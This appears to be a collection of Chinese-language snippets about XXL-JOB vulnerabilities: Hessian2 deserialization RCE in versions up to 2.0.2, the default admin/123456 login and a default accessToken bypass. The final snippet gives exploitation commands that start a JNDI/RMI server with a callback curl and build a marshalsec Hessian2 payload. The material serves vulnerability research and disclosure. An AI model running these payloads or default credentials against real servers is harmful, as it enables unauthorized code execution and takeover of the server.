这里可以看到有一个反序列化操作 ,跟进deserialize看看 deserialize 是一个抽象方法 xxl-job-2.0.2\xxl-job-admin\src\main\java\com\xxl\job\admin\core\schedule\XxlJobDynamicScheduler.java中 可以得出,上面的反序列化会进入到HessianSerializer类中为hessian2反序列化。 漏洞利用 javax.el.ELProcessor 本地开rmi...
默认口令漏洞成因: 成因:开发者为了方便测试或部署,设置了默认的登录账号和密码,且未提醒用户修改。 影响:攻击者可轻松登录后台,进行恶意操作,如添加、删除任务,查看敏感信息等。Hessian反序列化漏洞成因: 成因:xxl-job-admin在处理Hessian2序列化数据时,未对输入数据进行充分的安全校验。 影响:攻击者可构造恶意的...
1.先部署调度中心xxl-job-admin 调度中心访问地址:http://localhost:8080/xxl-job-admin(该地址执行器将会使用到,作为回调地址) 默认登录账号 “admin/123456”, 登录后运行界面如下图所示。配置文件如下2.部署执行器项目 负责接收“调度中心”的调度并执行;可直接部署执行器,也可以将执行器集成到现有业务项目中。
xxl-job=2.0.2反序列化漏洞 xxl-job <=2.0.2 反序列化漏洞 搭建 下载源码,导⼊idea,mysql导⼊sql⽂件,修改数据库配置后运⾏XxlJobAdminApplication即可成功启动项⽬。漏洞分析 \xxl-job-2.0.2\xxl-job-admin\src\main\java\com\xxl\job\admin\controller\JobApiController.java中api接⼝设置...
一、XXL-job简介 在平时的业务场景中,经常有一些场景需要使用定时任务,比如: 某个时间点发送优惠券 发送短信等等 批量处理数据:批量统计上个月的账单,统计上个月销售数据等等 固定频率的场景:每隔5分钟需要执行一次 定时任务在业务场景中非常常见,而且对于现在快速消费的时代,每天都需要发送各种推送,消息都需要依赖定时...
链接:https://github.com/jas502n/xxl-job 本文主要针对xxl-job低版本api接口存在Hessian2反序列化,可以直接攻击调度中心. 测试环境 xxl-job 2.0.2 Jdk: 8u191 Linux JobApiController#api 在version<2.0.2版本中,JobApiController#api中调用invokeAdminService处理请求数据. 且设置了造成@PermessionLimit(li...
前一段时间在一个红队项目中偶然间发现了一个XXL-JOB,比较老的一个洞了,搭建成功后会有一个默认账号密码admin/123456写在文件中的。这不是重点,重点是xxl-job <=2.0.2存在Hessian2反序列化。 0x01分析 首先看一下这个未授权反序列化中的未授权,这里判断是否有权限限制的时候默认false了这就导致api可以未授权...
File metadata and controls Preview Code Blame 8 lines (5 loc) · 250 Bytes Raw XxlJob-Hessian-RCE此漏洞为Xxljob配置不当情况下反序列化RCEXxlJob<=2.1.2,需要利用Hessian触发。XxlJob >= 2.2.0 会支持RESTFUL API,直接打公开的POC过去即可。该项目主要是探讨Hessian触发方式。
0x02 漏洞概述 XXL-JOB 默认配置下,用于调度通讯的 accessToken 不是随机生成的,而是使用 application.properties 配置文件中的默认值。在实际使用中如果没有修改默认值,攻击者可利用此绕过认证调用 executor,执行任意代码,从而获取服务器权限。 0x03 影响版本 ...
XXL-JOB 2.0.2 1.开启RMI服务 java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -A 0.0.0.0 -C "curl [Address]:5555" 使用最后一个。 2.生成Payload java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Hessian2 SpringAbstractBeanFactoryPointcutAdvisor rmi://[RMI Address]:1099/stbjir >...